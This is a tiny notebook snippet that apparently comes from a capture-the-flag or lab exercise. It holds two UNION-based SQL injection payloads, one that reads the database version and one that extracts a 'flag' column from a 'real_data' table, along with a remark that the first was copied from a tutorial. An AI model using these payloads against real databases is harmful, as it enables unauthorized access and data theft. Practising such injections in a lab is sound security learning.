In [ ]:
-- find out version
' union select 1,2,3,4,5, version() -- -

it is a copy form the tutoiral union

In [ ]:
' union SELECT id, flag, 3, 4, 5, 6 FROM real_data where id='1' -- -